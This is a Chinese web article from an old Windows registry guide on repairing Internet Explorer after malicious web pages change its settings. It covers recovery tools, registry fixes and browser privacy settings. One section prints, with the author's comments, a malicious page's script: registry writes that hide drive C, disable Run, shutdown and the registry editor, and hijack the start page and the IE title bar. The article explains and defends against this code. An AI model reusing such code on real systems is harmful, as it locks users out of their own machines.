| 〖打印本页〗〖打印选项〗 |
| Windows 注册表攻略(二、注册表修改实例:50-53) |
Windows 注册表攻略(二、注册表修改实例:50-53) 50、恶意修改IE的恢复方法 由于近期很多网友反映自己的IE遭到一些,网站使用Javascipt技术的恶意更改,因此,本论坛特推出这个修改专题,希望大家可以应付这些情况。如果大家还有什么问题可以去我们的软件诊所来问。 一、修改IE的标题栏 即在IE浏览器最上方的蓝色横条里做广告,而不是显示默认的“Microsoft Internet Explorer”。这种修改非常常见,有人也特意针对它编制了反修改的程序。 1.注册表法 HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorerMain HKEY_CURRENT_USER\Software\Microsoft\InternetExplorerMain在注册表中找到以上两处主键,将其下的“Window Title”主键删除,并关闭所有打开的IE浏览器窗口再重新打开就能看到效果。 2.MagicSet法 点击“IE 4/5”,点击与“IE 标题”字体平行的“复原”按钮即可。 二、修改IE的首页 这个改回来很方便,在IE的设置里就有。比较麻烦的是某些网页在浏览者的硬盘里写入程序,使重启计算机后首页设置又被改了回去,这时可使用“系统配置实用程序”来解决。开始—运行,键入msconfig点击“确定”,在弹出的窗口中切换到“启动”选项卡,禁用可疑程序启动项。 三、在Windows启动时显示一个窗口,点确定才能进去 这个设置其实与IE无关,而是Windows的登录提示窗口,不过最近有些网页对它动上了脑筋,在这个窗口里做广告。 1.注册表法 HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\Winlogon在注册表中找到此主键,将其下的“LegalNoticeCaption”和“LegalNoticeText”主键删除即可。 2.MagicSet法 点击“安全与多用户”,再点击左上角的“+”切换窗口后,清除“启动时要显示的标题”和“启动时要显示的信息”两项内容即可。 四、在IE里点击鼠标右键。在弹出的菜单里显示网页广告 这种情况很少见,我还没碰到过,不过解决方法也不复杂。 1.注册表法 HKEY_CURRENT_USER\Software\Microsoft\InternetExplorerMenuExt在IE中显示的附加右键菜单都在这里设置,常见的网络蚂蚁和网际快车点击右键下载的信息也存放在这里,只需找到显示广告的主键条目删除即可。 2.MagicSet法 点击“IE 4/5”,再点击左上角的“+”切换窗口后,在上方的列表窗口中即可修改、删除IE的附加右键菜单项。 五、禁止或允许用户修改IE首页: 运行注册表编辑器(开始菜单-运行-regedit-确定), 打开[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel], 其实一般此键是不存在的, 只存在[HKEY_CURRENT_USER\Software\Policies\Microsoft], 所以后面一截你要自己建立, 主键建立完后在Control Panel键下新建一个DWORD值数据, 键名为HOMEPAGE(不分大小写), 键值为1. 此时你打开IE属性时可以发现它改首页设置的部分已经不可用了. 当然如果你想先指定主页的话可以把HOMEPAGE的值改为0或删除它, 然后修改主页设置, 再把HOMEPAGE改回来即可 六、去掉注册表编辑器被锁定问题 win2000系统 Windows Registry Editor Version 5.00 [Hkey_current_user\Software\microsoft\windows\currentversion\Policies\system] "DisableRegistryTools"=dword:00000000 win98/me系统 REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 将以上代码copy到记事本中,然后将这个文件的名字改为*.reg双击运行可以解除你的锁定状态.如果你对这个东西不是很了解可以点击这里下载reg文件2000系统的,98/me系统的 七、防范 1.因为修改注册表设置都是用的javascript脚本语言,所以只需禁用它即可。但这种脚本语言应用广泛,所以建议在IE的设置中将脚本设为“提示”。 2.建议使用一些单窗口多页面的浏览器如NetCaptor,myie等,因为它们往往能更方便地切换脚本设置,象我常用的NetCaptor,用工具栏中的“安全”按钮能很方便地设置脚本、ActiveX和Cookie的启用情况。 3.使用IE6.0,虽然迟迟看不到这个浏览器的正式版本,而且测试版问题很多,但据用过的人说使用它浏览网页,将无法再随意修改你的注册表。 4.使用Win2000的朋友,只需在“控制面板”—“管理工具”—“服务”中禁用Remote Registry Service服务,也无法通过浏览网页来修改你的注册表了。 5.使用Norton AntiVirus 2002 v8.0杀毒软件,这个版本新增Script Blocking功能,将通过IE修改注册表的代码定义为Trojan.Offensive并予以拦截。 51、IE恶意修改之终极解决方案 近几个月来,IE被恶意修改的情况越来越多,也越来越严重,从修改IE首页到修改IE右键菜单甚至Windows开始菜单,只要到关于网络安全的论坛上找一找,每天都有人问怎样恢复IE被恶意修改的问题。现在,我们先看看IE被修改的现象。 一、IE被修改现象 1、IE起始主页被修改;相对而言,这是比较“友好”的修改方式了,因为我们还可以通过简单的方法改回来; 2、IE起始主页被修改,并且在IE自带的主页设置选项不能修改,变为灰色。 3、自动在IE收藏家加入该主页;这种情况有两种:(1)、直接加入收藏夹;(2)、加入收藏夹的子文件夹,比如“媒体”文件夹; 4、自动在IE菜单的【工具】加入该网页; 5、在IE右键菜单加入该网页; 6、修改IE标题栏; 7、开机出现提示框; 8、注册表不能使用甚至regedit.exe文件被删除其实是移到了Temp文件夹; 9、将该网站快捷方式加入Windows的开始菜单、桌面等; 10、开机自动打开浏览器访问指定网站; 以上我们列出了现在网络上流行的修改IE甚至Windows的大部分现象甚至全部,这些修改是怎样形成的,已经有很多文章提到。我们现在重点看看怎样把这些讨厌的设置改回来。当然,我不会告诉你一个个记那些注册表选项,一不小心修改错误,连系统也不稳定。 现在我们用两种方法恢复IE:一是使用绝对信得过的软件;二是使用最简单而又最有效的注册表修改方法,当然,你不必记那些繁琐的注册键对应的选项。 二、金山毒霸注册表修理工具 现在编程的人实在很多,编写修改注册表的程序的人就更多,我在网上也不知道看见多少,有些只能修改IE主页,有些能修改不少,但是只能使用10次,有些却又要注册。这些都没关系,关键一点,涉及注册表的东西,最好还是使用名牌软件公司的好些,在这里,我们要有一点品牌意识。金山毒霸我们已经很熟悉了,相信他们的注册表修理工具绝对不会出问题。好,我们看看它的使用。 (一)、下载和安装金山毒霸注册表修理工具 可以在这里下载,该软件是绿色软件,不要安装,点击直接运行。 (二)、金山毒霸注册表修理工具可以修改的项目 基本上,IE的修改都可以恢复,包括: 1、IE主页方面的修改; 2、IE标题修改; 3、IE属性设置方面的修改; 4、Windows开始菜单修改; 这些修改项目对一般的IE被修改已经完全可以解决,毕竟,不是所有的网页都那么过分。 三)、金山毒霸注册表修理工具的使用 双击打开金山毒霸注册表修理工具。 很简单,直接选择要清理项目按【清理】按钮就可以了。或许你担心自己不知道怎样选择要修改的项目,那么很简单,使用默认,全部选定这些项目,按【清理】按钮全部清理就行了。因为这些修改都是回到IE或者Windows的默认设置,所以,不必担心会出问题。 三、超级兔子系列软件 超级兔子是国内有名的软件系列了,他们的软件,基本上全部是注册表修改方面的。关于IE修改,超级兔子有两个软件可以使用:超级兔子魔法设置和超级兔子注册表保护器。 (一)、超级兔子魔法设置 超级兔子魔法设置几乎可以解决所有我们以上提到的问题。现在我们看它的使用。 1、下载与安装 超级兔子魔法设置可以在这里下载,下载完成以后,和一般软件的安装没有区别。为了下面的使用我们可以更加清楚,我们先看看超级兔子魔法设置的界面。 2、超级兔子魔法设置的使用 在这里,我们不会详细介绍超级兔子的所有使用方法,只是介绍与我们主题相关的一些使用。 (1)、开机自动打开浏览器到指定网页的修改 开机自动打开浏览器到指定网页的修改,其时就是开机启动项的设置,我们可以直接在Windows修改,方法为:【开始】->【程序】->【附件】->【系统信息】->【工具】->【系统配置实用程序】->【启动】,我们得到以下界面。 在以上界面中,有一项是我们要修改的,仔细查看每一项的【命令】,我们可以看到【名称】为“Seekmm”的项,它的命令为“c:\Program Files\Internet Explorer\iexplore.exe c:\windows\seekmm.htm”,其实就是一个网页,也就是开机打开的网页。需要注意的是,有时候开始打开网页的命令部分也可以是一个网址,没有上面那么复杂。 在超级兔子魔法设置里面就没有以上修改那么复杂,选择主界面的【自动运行】,得到以下界面。 同样,我们可以找到“seekmm”这一项,选定直接按【删除】按钮就行了。 (2)、开始菜单被修改的恢复 有些网站会修改开始菜单,隐藏【运行】这一项,我们可以在超级兔子里面修改,在主界面选择【开始菜单】,出现以下界面。 我们看到【运行】已经被禁止,将【运行】前面的勾去掉保存就可以了。 (3)、IE相关修改 这里可以修改与IE相关的一些选项,选择主界面的【IE浏览器】,出现以下界面。 我们可以看到,IE的标题、默认打开的网页等已经被修改,直接【复原】保存就可以恢复。 (二)、超级兔子注册表保护器 超级兔子注册表保护器其实已经包含在超级兔子魔法设置里面,同时,超级兔子注册表保护器也可以单独下载。相对以上的魔法设置,超级兔子注册表保护器可以设置更多的IE选项,同时,还可以保护注册表,以免再次被修改。 1、下载与安装 可以在这里下载, 安装和一般软件没有区别。 2、具体使用 在【程序】的【超级兔子注册表保护器】选择【超级兔子注册表保护器】,出现以下界面。 在这里,可以恢复IE的大部分设置,包括标题栏、首页、右键菜单、浏览器选项;也可以修改开机弹出网页、开机弹出标题、注册表被锁定等。直接按清理按钮就可以恢复了。在这里,需要重点注意,这里的【清除】直接将IE恢复到默认状态,那么,对于IE的邮件菜单而言,我们右键菜单里面的网络蚂蚁和FlashGet也就一起清除了。所以,这里要注意不选择【IE浏览器的鼠标右键】。 四、最简单的就是最有效的修改方法 看武侠小说多了,有时候发现,最简单的往往就是最有效的招式。修改有关的IE注册表也一样,其实,只要一招就可以:直接搜索。 因为对IE的修改,包括标题、右键、工具菜单、开机弹出窗口等,总是要联系到一个网页或者网页标题,我们直接在注册表搜索这些文字,将它们全部删除,IE的修改也就完成了。完全不必去记那些注册表的“键”,修改什么搜索什么,这一招是最有效的。我们现在就来看看。 刚才我们看到IE浏览器的标题已经被修改为“http://www.youmiss.com<;=难忘浪漫大学”,在【开始】->【运行】输入“regedit”,出现注册表编辑器,选择菜单【编辑】->【查找】,出现以下界面图。 输入查找目标,按【查找下一个】就行查找,我们立即找到了被修改的注册项。 双击这一项,将它改为空白就可以了;是不是这样就完了?不,最好还是再搜索一下,按【F3】,果然又找到一个,这一次在 HKEY_LOCAL_MACHINE\Software\Microsoft\Internet ExplorerMain”的【Window Title】里面!继续修改。 使用以上方法,我们可以解决IE本身被修改的大部分问题,关键记住一点,一定要搜索完成才算修改完成,也就是,搜索完以后按【F3】再搜索,直到再也找不到那一项。 五、总结 以上我们介绍了两个软件和自己手工修改的方法来恢复IE和Windows,这些方法应该是简单而且有效的,个人认为有一个金山毒霸注册表清理工具和上文介绍的搜索方法就可以解决问题了。 52、杜绝IE浏览的安全隐患 当你在享受因特网带来的便利时,有没有注意到它也会在悄无声息中带来危险?尤其是在网上购物、注册邮箱或者注册网站会员的时候,你能保证所提交的个人信息不会被窃取吗?我们常用的Windows捆绑的IE浏览器,虽然简单易用,但却存在安全隐患,下面我们就来看看IE会带来什么危险,以及我们该如何防范吧。 1、IE的自动登录 拨号上网用户使用IE时,连接对话框有个“保存密码”选项,在Web页面直接登录邮箱时也有“保存密码”选项。看“*”号工具软件可以轻易将密码翻译出来。建议你尽量不要使用该选项。 2、IE的颜色足迹 IE以及Web页面设计者一般都将页面上未访问的和已访问过的链接设置成不同的颜色,虽说方便了用户浏览,但不经意间会泄露了你的浏览足迹。在IE的菜单栏点击[工具]→[Internet选项]→[常规]→[辅助功能],在随后的对话框内勾选格式区域的“不使用Web页中指定的颜色”项,确定之后,点击[颜色]按钮,在“颜色”区域勾选“使用Windows颜色”,在“链接”区域通过色板将未访问的和访问过的链接的颜色设置成相同,别人就看不到你的浏览足迹了。 3、IE的Cookie Cookie,我们已经介绍过多次了,它可不仅仅是小甜饼哦!可以通过设置不同的安全级别来限制Cookie的使用。如果要彻底删除Cookie,可将目录“Windowscookies”下的所有文件全部删除,这样就可有效保护你的个人隐私了。当然使用个人防火墙也可以对Cookie的允许、提示、禁止等功能的进行使用限制。 4、IE的自动完成 IE的自动完成功能给用户填写表单和输入Web地址带来一定的便利,但同时也给用户带来了潜在的危险,尤其是对于在网吧或公共场所上网的网民。若需禁止该功能,只需点击[工具] →[Internet选项]→[内容],在“个人信息”区域单击[自动完成]按钮,在随后的对话框内清除Web地址、表单及表单的用户名和密码项的选择。 5、IE的历史记录以及临时文件夹 我们在上网浏览信息时,浏览器会把我们在上网过程中浏览的信息保存在历史记录以及临时文件夹(WindowsTemporary Internet Files)中,这样下次再访问同样信息时可以很快地达到目的地,从而提高了我们的浏览效率,但是通过IE的脱机浏览,其他用户能够轻松地翻阅你浏览的内容。如何保护个人信息资料的安全呢?方法如下:点击[工具]→[Internet选项]→[常规]→[删除文件],在“删除文件”对话框中勾选“删除所有脱机内容”,[确定]即可。另外,也可以设置成自动删除临时文件,切换至“高级”选项卡,在安全区域勾选“关闭浏览器时清空Internet临时文件夹”。这样在关闭IE时就会自动删除临时文件夹中的内容了;然后在同样的对话框中单击[清除历史记录]按钮来删除浏览器中的历史记录中的内容。 6、屏蔽ActiveX控件 由于ActiveX控件可以被嵌入到HTML页面中,并下载到浏览器端执行,因此会给浏览器端造成一定程度的安全威胁。同时,其他一些技术,如内嵌于IE的VB Script语言,还有一些新技术,如ASP(Active server Pages)技术同样也都存在着一定的安全隐患。所以我们要屏蔽掉这些可能对计算机安全构成威胁的ActiveX控件,方法如下:点击[工具]→[Internet选项]→[安全]→ [自定义级别],在打开的“安全设置”对话框中找到关于ActiveX控件的设置,就选择“禁用”好了。 7、IE的安全区域设置 IE的安全区设置可以让你对被访问的网站设置信任程度。我们在上网浏览信息时,应经常通过一些报刊杂志来搜集一些黑客站点或其他一些破坏站点的相关信息,并时时注意哪些站点会恶意窃取别人的个人信息,通过一些相关设置来拒绝这些站点对你的信息的访问,从而使浏览器能够自动拒绝这些网站发出的某些对自己有安全威胁的指令。方法是:点击[工具]→[Internet选项]→[安全],单击“受限站点”右边的[站点]按钮,将需要限制的站点的地址添加进去,完成站点地址的添加工作以后,单击[确定]按钮,浏览器将对上述的受限站点起作用。 现在,你是不是对IE浏览器的安全问题有了一个新的认识?采用上述的方法来保护自己个人信息的安全,从而更加安全的使用网络,那么也就达到笔者写本文的目的了。 53、浏览网页注册表被修改之迷及解决办法 浏览网页会被修改注册表?千真万确!如果你去浏览过下面的网页:http://www.findfeel.com/default.htm ,你真有生不如死的感觉! 进入该网页会被: 1.修改开始菜单 1)禁止“关闭系统” 2)禁止“运行” 3)禁止“注销” 2.隐藏C盘——你的C盘找不到了 3.禁止使用注册表编辑器regedit 4.禁止使用DOS程序 5.使系统无法进入“实模式” 6.禁止运行任何程序 7.将IE浏览器的首页改为http://www.findfeel.com/,收藏夹中也被加入该网址。 那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。 注:下面代码是将你的IE默认连接首页改为 http://www.findfeel.com/Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Start Page", "http://www.findfeel.com/";); 注:以下是该网页修改受害者的注册表项所用的招数 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion \\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); 注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoClose", 01, "REG_BINARY"); 注:使受害者系统没有“关闭系统”项 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); 注:使受害者系统没有“注销”项 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"); 注:使受害者系统没有逻辑驱动器C Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\WinOldApp\\ Disabled","REG_BINARY"); 注:禁止运行所有的DOS应用程序; Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\ \WinOldApp\\NoRealMode","REG_BINARY"); 注:使系统不能启动到“实模式”(传统的DOS模式)下; 又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前) Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeCaption", "呜啦啦..."); 注:这些代码会使窗口的标题是“呜啦啦…” Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界"); 注:上面一行是会在窗口中显示出来的文字 注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…” Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦..."); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\Window Title", "呜啦啦..."); 注:到上面一行为止,完成了对受害者的注册表的所有修改! 注:下面代码用来将其网页增加到受害者的收藏夹中 var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "\\Documents and Settings\" + Net.UserName + "\\Favorites"; if(!FSO.FolderExists(loc)) { return; } } 注:下面就是使其网页加入到你的收藏夹的具体代码 AddFavLnk(loc, "找到感www.findfeel.com", "http://www.findfeel.com";); 由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。 受害用户的修复方法: 1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。 2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何重启机器就OK了。 unlock.reg文件内容如下: Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDriveTypeAutoRun"=dword:00000095 "NoRun"=hex: "NoLogOff"=hex: "NoDrives"=dword:00000000 "RestrictRun"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "Disabled"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "NoRealMode"=dword:00000000 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="" "LegalNoticeText"="" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] "Window Title"="IE浏览器" [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Window Title"="IE浏览器" 预防办法: 1.要避免中招,关键是不要轻易去一些自己并不了解的站点。 2.在IE设置中将ActiveX插件和控件、Java脚本等全部禁止 3.可以通过升级到最新的病毒库,来预防该类恶意网页的侵害。 4.既然该网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”! 加锁方法如下: (1)运行注册表编辑器regedit.exe; (2)展开注册表到 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器regedit.exe。 解锁方法如下: 用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下: REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000000 存盘。你就有了一把解锁的钥匙了!如果要使用注册表编辑器,则双击unlock.reg即可。要注意的是,在“REGEDIT4”后面一定要空一行,并且“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃! 说明:对于“万花谷”网页的恶意代码带来的破坏,也可按上面所提的方法来预防,中招后也可参考上面的方法解决。另,KV3000对“万花谷”可完全恢复,对本文介绍的网页破坏系统现象,则无法安全恢复。 文章作者:未知 |